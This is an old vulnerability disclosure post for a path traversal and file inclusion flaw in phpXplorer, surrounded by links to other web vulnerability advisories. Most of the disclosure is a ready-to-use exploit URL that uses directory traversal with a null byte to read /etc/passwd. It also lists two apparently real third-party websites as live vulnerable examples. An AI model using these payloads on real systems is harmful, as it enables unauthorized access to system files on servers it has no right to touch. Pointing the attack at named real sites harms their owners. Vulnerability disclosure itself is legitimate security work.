Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) [SA18557] Gallery Fullname Script Insertion Vulnerability [SA18556] Etomite "cij" Shell Command Execution Backdoor Security Issue [eVuln] WebspotBlogging Authentication Bypass Vulnerability Land Down Under Signature HTML Code Injection From::) :) <liz0_(at)_bsdmail.com> Date:20.01.2006Subject:phpXplorer file inclusion biyosecurity.besite:www.phpxplorer.org ------------------------------------------------ http://victim/folder/system/action.php?sShare=guest&sAction=../../../../../../../../../../../../etc/passwd%00 ------------------------------------------------- example: http://fta.lv/phpXplorer/system/action.php?sShare=guest&sAction=../../../../. ./../../../../../../../etc/passwd%00 http://lasersprint.com/phpXplorer/system/action.php?sShare=guest&sAction=../. ./../../../../../../../../../../etc/passwd%00 ------------------------------------------------ Credit:Liz0ziM&Cyberlord biyosecurity.be ------------------------------------------------- source: http://www.blogcu.com/Liz0ziM/200529/
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
[SA18557] Gallery Fullname Script Insertion Vulnerability
[SA18556] Etomite "cij" Shell Command Execution Backdoor Security Issue
[eVuln] WebspotBlogging Authentication Bypass Vulnerability
Land Down Under Signature HTML Code Injection
